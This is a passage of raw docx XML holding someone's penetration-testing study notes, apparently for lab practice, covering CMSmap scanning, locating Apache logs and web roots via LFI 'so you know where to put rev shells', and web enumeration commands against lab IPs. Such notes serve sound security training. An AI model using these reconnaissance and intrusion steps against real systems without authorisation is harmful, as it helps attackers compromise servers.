    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo clock-sync &lt;DC IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset time to normal </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo clock-sync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dd2ff67gcn" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMSmap</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hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/dionach/CMSmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python cmsmap.py http://$IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 cmsmap.py http://$IP</w:t>
      </w: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t xml:space="preserve">This was from Powall's cheatsheet</w:t>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0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_roiu7d2yh14l" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache</w:t>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t xml:space="preserve">This was used in the doas subssection in the /bin section for Relia </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">172.16.xxx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.20</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t xml:space="preserve">Apache logs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000305">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000306">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fw624e89ok2z" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find the root directory of Apache (Apache root) (so you know where to put rev shells)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000309">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, they looked here using LFI (to find Apache web root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/apache2/sites-enabled/000-default.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for a line that says </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DocumentRoot'</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /etc/httpd/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000310">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /etc/apache2/sites-available/000-default.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000311">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /etc/apache2/sites-available/default-ssl.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000312">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For FreeBSD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab Machine 172.16.xxx.20</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /usr/local/etc/apache24/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000314">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is for apache 2.4 so replace it as needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000315">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /usr/local/etc/apache22/httpd.conf </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000316">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for apache 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000317">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You may also need to check extra/httpd-vhosts.conf for virtual hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000318">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -i 'DocumentRoot' /usr/local/etc/apache24/extra/httpd-vhosts.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000319">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also google it. From google, it seems:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">default is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1333"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html (Ubuntu 14.04 and later, and many other distributions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1333"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www (older Ubuntu versions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1333"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/apache/htdocs (if Apache was compiled from source)</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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u3hzroo152gl" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always look at page source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000325">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory/subdomain enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000326">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I always forget </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subdomain enumeration!!!!</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21">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 useful</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL Encoder/Decoder Website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://meyerweb.com/eric/tools/dencoder/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wappalyzer </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to look at what version of services are running and then look for vulnerability!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I http://10.10.10.242</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whatweb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whatweb http://192.168.50.244</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default things to try: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
